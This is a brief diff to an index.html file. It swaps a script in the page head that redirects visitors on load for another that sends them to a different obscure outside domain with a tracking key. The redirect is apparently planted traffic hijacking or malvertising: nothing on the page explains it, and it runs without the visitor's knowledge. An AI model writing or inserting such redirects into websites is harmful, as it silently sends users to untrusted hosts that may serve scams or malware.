--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="en">
 <head>
   <script type="text/javascript">
-window.location.href = "https://obese-pin.com/Ni7AUG";
+window.location.href = "https://isabellaentire.com/fzs4xmtm?key=4f71367742da072f342dbf8ceaf7659d";
 </script>
 
     <meta charset="UTF-8">
